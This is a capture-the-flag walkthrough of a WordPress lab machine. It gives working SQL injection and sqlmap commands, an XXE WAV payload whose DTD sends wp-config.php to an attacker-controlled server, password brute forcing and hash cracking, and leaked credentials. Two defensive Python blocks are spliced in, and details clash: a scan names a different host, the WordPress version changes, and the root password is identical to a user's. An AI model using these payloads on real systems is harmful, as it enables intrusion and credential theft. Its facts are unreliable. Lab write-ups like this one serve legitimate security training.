Quick Look

  • Rustscan
Open 10.10.11.180:21
Open 10.10.11.180:22
Open 10.10.11.180:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-21 14:53 EST
Initiating Ping Scan at 14:53
Scanning 10.10.11.180 [2 ports]
Completed Ping Scan at 14:53, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 14:53
Scanning shoppy.htb (10.10.11.180) [2 ports]
Discovered open port 22/tcp on 10.10.11.180
Discovered open port 80/tcp on 10.10.11.180
Completed Connect Scan at 14:53, 0.05s elapsed (2 total ports)
Nmap scan report for shoppy.htb (10.10.11.180)
Host is up, received syn-ack (0.046s latency).
Scanned at 2022-11-21 14:53:37 EST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

  • Web Browser
    • Looks like a WordPress website running WordPress 5.2.6
    • Handful of pages
  • Host name
    • http://metapress.htb
    • echo "10.10.11.180 metapress.htb" | sudo tee -a /etc/hosts   (sudo echo ... >> /etc/hosts fails, because the redirect runs in the unprivileged shell)
  • Directory Brute force
about                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 496ms]
login                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 455ms]
events                  [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 449ms]
0                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 400ms]
feed                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 443ms]
atom                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 407ms]
s                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 442ms]
a                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 421ms]
wp-content              [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 67ms]
c                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 448ms]
admin                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 417ms]
t                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 416ms]
e                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 956ms]
h                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1557ms]
rss2                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1523ms]
About                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1577ms]
ca                      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1119ms]
event                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1112ms]
wp-includes             [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 50ms]
C                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1350ms]
A                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1178ms]
S                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1846ms]
E                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1520ms]
about-us                [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1520ms]
Events                  [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1571ms]
T                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1212ms]
H                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1403ms]
sa                      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 2129ms]
rdf                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1609ms]
page1                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1200ms]
sample                  [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1464ms]
'                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1331ms]
th                      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1685ms]
CA                      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 855ms]
dashboard               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1413ms]
he                      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1498ms]
ab                      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1936ms]
%20                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1347ms]
sam                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1422ms]
hello                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1391ms]
ev                      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1424ms]
wp-admin                [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 49ms]
cancel                  [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1326ms]
eve                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 2005ms]
can                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1467ms]
0000                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1780ms]
2022                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1178ms]
Event                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1273ms]
About-Us                [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1328ms]
hello-world             [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1529ms]
embed                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1373ms]
abo                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1804ms]
hell                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1260ms]
SA                      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1665ms]
AB                      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1384ms]
Hello                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1747ms]
Oasis - 'Definitely Maybe' [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1447ms]
TH                      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1319ms]
EVENTS                  [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1660ms]
Cancel                  [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1736ms]
Sample                  [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1457ms]
                        [Status: 200, Size: 10342, Words: 423, Lines: 156, Duration: 1541ms]
!                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1495ms]
ABOUT                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1827ms]
hel                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1610ms]
Bling!                  [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1308ms]
EV                      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1275ms]
Check Screenshots!      [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1234ms]
Check All Tracker Features! [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1236ms]
About Us                [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1501ms]
CAN                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1165ms]
yahoo!                  [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1179ms]
About%20Us              [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1424ms]
SAM                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1779ms]
Welcome!                [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1892ms]
:: Progress: [87664/87664] :: Job [1/1] :: 23 req/sec :: Duration: [0:54:16] :: Errors: 0 ::
  • VHOSTS

Next Step


  • scan for users
    • wpscan --url http://metapress.htb/ --enumerate u
[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <================================================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://metapress.htb/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Sitemap (Aggressive Detection)
 |   - http://metapress.htb/wp-sitemap-users-1.xml
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] manager
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

With these scans I discovered that there appear to be no plugins and one theme, Twenty Twenty-One. There also appeared to be two users, admin and manager, both of which I ran multiple brute-force attempts against using the following command.

wpscan --url http://metapress.htb -t 100 -e -P /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-10000.txt  -U 'manager,admin'

After this failed I moved on to looking at the website's source code.


Event plugin


As I began looking through the source code of the website I stumbled onto http://metapress.htb/events. This tab was powered by the BookingPress plugin, which is vulnerable to unauthenticated SQL injection. Once I figured out the vulnerability I only had to find the correct CVE and POC. Copying the POC from the website, I edited it in my favorite text editor. I first changed the URL to http://metapress.htb, then opened http://metapress.htb/events and searched the source code for _wpnonce, which is the key hard-coded into the HTML to keep the user from sending arbitrary requests like the one we want to send.

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=65ad7bec42&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

I then pasted it into the terminal and ran it.

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 13 Dec 2022 01:30:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.0.24
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin

[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}] 


Exploiting the Database


The first thing I did was to take the curl command and run it with the -v flag for verbose output. I then copied out the headers and the URL and created a request.txt file for sqlmap, with the * marking the injection point.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: curl/7.85.0
Accept: */*
Content-Length: 158
Content-Type: application/x-www-form-urlencoded

action=bookingpress_front_get_category_services&_wpnonce=65ad7bec42&category_id=33&total_service=*

Taking this file I ran sqlmap -r request.txt -p total_service --batch to make sure the request file was working. I then enumerated the available databases with sqlmap -r request.txt -p total_service --dbs. With the results from this command I decided to enumerate the blog database using sqlmap -r request.txt -p total_service -D blog --tables. Finally I dumped the contents of the wp_users table using sqlmap -r request.txt -p total_service -D blog -T wp_users --dump.

Database: blog
Table: wp_users
[2 entries]
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url             | user_pass                          | user_email            | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | http://metapress.htb | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. | admin@metapress.htb   | admin      | 0           | admin        | admin         | 2022-06-23 17:58:28 | <blank>             |
| 2  | <blank>              | $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 | manager@metapress.htb | manager    | 0           | manager      | manager       | 2022-06-23 18:07:55 | <blank>             |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

Taking these hashes from sqlmap I pasted them into a text file on separate lines and ran hashcat with the rockyou wordlist: hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt. After a few seconds I discovered the password for manager is partylikearockstar. Using this information I went to http://metapress.htb/wp-admin and logged in.
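To show why the hashcat run above finished in seconds, here is an added Python implementation of the portable phpass scheme behind WordPress's $P$ hashes (this is not code from the writeup or from WordPress; phpass_cost, phpass_crypt and phpass_verify are names chosen here). It reads the cost from the hash, reproduces the MD5 chain, and checks a candidate against the manager hash from the dump.

```python
import hashlib

# phpass's own base64 alphabet; the 4th hash character indexes into it.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw: bytes, count: int) -> str:
    """phpass's custom base64 (no padding, 3 bytes -> 4 chars, 16 bytes -> 22)."""
    out, i = "", 0
    while i < count:
        value = raw[i]
        i += 1
        out += ITOA64[value & 0x3F]
        if i < count:
            value |= raw[i] << 8
        out += ITOA64[(value >> 6) & 0x3F]
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out += ITOA64[(value >> 12) & 0x3F]
        if i >= count:
            break
        i += 1
        out += ITOA64[(value >> 18) & 0x3F]
    return out


def phpass_cost(setting: str) -> int:
    """MD5 iteration count: 2 ** (position of the 4th character in ITOA64)."""
    return 1 << ITOA64.index(setting[3])


def phpass_crypt(password: str, setting: str) -> str:
    """Portable phpass: md5(salt + pw), then `cost` rounds of md5(prev + pw)."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a portable phpass hash")
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(phpass_cost(setting)):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)  # "$P$" + cost + 8-char salt + 22 chars


def phpass_verify(password: str, stored: str) -> bool:
    return phpass_crypt(password, stored) == stored


MANAGER_HASH = "$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70"  # manager row of the sqlmap dump above

if __name__ == "__main__":
    print("cost:", phpass_cost(MANAGER_HASH))  # 'B' -> 2**13 = 8192 rounds, cheap on a GPU
    print("match:", phpass_verify("partylikearockstar", MANAGER_HASH))
```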


Taking Over WordPress


After logging in to WordPress as manager I looked around and discovered the only privilege the manager user had was to upload media to the WordPress website. I did some research and discovered that there is a CVE for WordPress 5.6.2. This CVE allows an authenticated user to view files on the system through an XXE vulnerability when processing WAV and MP3 files.

The first step in exploiting this vulnerability is to create a file called payload.wav with the following content. The \x escapes have to become raw bytes, so the file is written with echo -en rather than pasted into an editor.

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSERVERIP:1234/payload_dtd.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

I then created a new file called payload_dtd.dtd and placed the following content in it.

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://IPADDRESS:1234/?p=%file;'>" >

I then started a PHP file server with php -S 0.0.0.0:1234 and uploaded the payload.wav file to WordPress. I then copied the base64-encoded result and pasted it into a new PHP file called decode.php.

<?php echo zlib_decode(base64_decode('DATA GOES HERE')); ?>

After running this command I looked through the contents of wp-config.php and saw that there was an FTP server with the credentials metapress.htb:9NYS_ii@FyL_p5M2NvJ. Using FileZilla I connected to the FTP server and navigated through the files to /mailer/send_mail.php. I downloaded this file and opened it. Looking through the file I discovered a new password for jnelson, jnelson:Cb4_JmWM8zUZWMu@Ys. With this information I opened the terminal, SSHed in to the metapress.htb server, and opened the flag.txt.

jnelson@meta2:~$ cat user.txt
47924baef081b516a973843cd82907d6
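As an added, defender-side example (not code from the original writeup or from WordPress), the following Python walks the RIFF chunk list of an uploaded WAV and flags iXML chunks that carry a DOCTYPE or external entity declaration, which is exactly the shape of the payload.wav above. The sample files, the ATTACKER-PLACEHOLDER host and the helper names are constructed here.

```python
import struct

# Markers that betray a DTD / external entity inside embedded XML metadata.
DANGEROUS_XML_MARKERS = (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM", b"PUBLIC")


def riff_chunks(data: bytes):
    """Yield (chunk_id, payload) for each chunk of a RIFF/WAVE file.
    Payloads are clamped to the real file length, so a size field that
    lies (the PoC above declares 0xb8/0x7b regardless of content) can
    never make the walker read past the end of the upload."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        yield chunk_id, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # RIFF chunks are word-aligned


def find_xxe_in_wav(data: bytes):
    """Return the markers found in iXML chunks ([] means the file looks clean)."""
    hits = []
    for chunk_id, payload in riff_chunks(data):
        if chunk_id == b"iXML":
            hits += [m.decode() for m in DANGEROUS_XML_MARKERS if m in payload]
    return hits


def build_wav(ixml: bytes) -> bytes:
    """Constructed sample: minimal WAVE with a 'fmt ' chunk and one iXML chunk."""
    fmt = b"fmt " + struct.pack("<IHHIIHH", 16, 1, 1, 8000, 8000, 1, 8)
    xml = b"iXML" + struct.pack("<I", len(ixml)) + ixml + b"\x00" * (len(ixml) & 1)
    body = b"WAVE" + fmt + xml
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed inputs: benign iXML metadata, and one shaped like the page's
# payload but pointing at an obvious placeholder host.
CLEAN_IXML = b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>'
XXE_IXML = (b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
            b"'http://ATTACKER-PLACEHOLDER:1234/payload_dtd.dtd'>%remote;]>")

if __name__ == "__main__":
    for name, blob in (("clean", build_wav(CLEAN_IXML)), ("xxe", build_wav(XXE_IXML))):
        print(name, find_xxe_in_wav(blob))
```

Flagging the upload is a triage aid only; the actual fix is the WordPress update that stops getID3 from resolving external entities.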

Privilege Escalation


The next thing I did was browse around the home directory. While I was looking around I discovered a directory called .passpie. Inside the .passpie directory I found a file called .key and a directory called ssh; in the ssh directory I found two files called root.pass and jnelson.pass. After discovering these files I decided to try running the command passpie to see if there was such a command, and to my surprise there was. Armed with this information I looked around on the internet and discovered passpie is a command line password manager that uses the GPG key on your Linux device to encrypt the passwords. Using the help I figured out I had to run the passpie export password_out.txt command to export the saved passwords to a text file called password_out.txt. After trying this command I discovered I needed a password to decrypt the GPG key. Remembering that I had seen a file called .key, I went back to it and discovered it was a GPG and PGP key file. I opened the .key file, copied the PGP key out of the file and pasted it into a new file. Using the gpg2john command I converted the PGP key to a hash that can be cracked using John the Ripper.

gpg2john pgp_file.txt > hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

After only a few seconds of brute forcing, John discovered that the password was blink182. Taking this password I went back to the target machine and ran the passpie export password_out.txt command, entering the password that I found. I then opened the password_out.txt file and copied the root SSH password Cb4_JmWM8zUZWMu@Ys. Finally I ran the su root command, entered my password, and opened root.txt.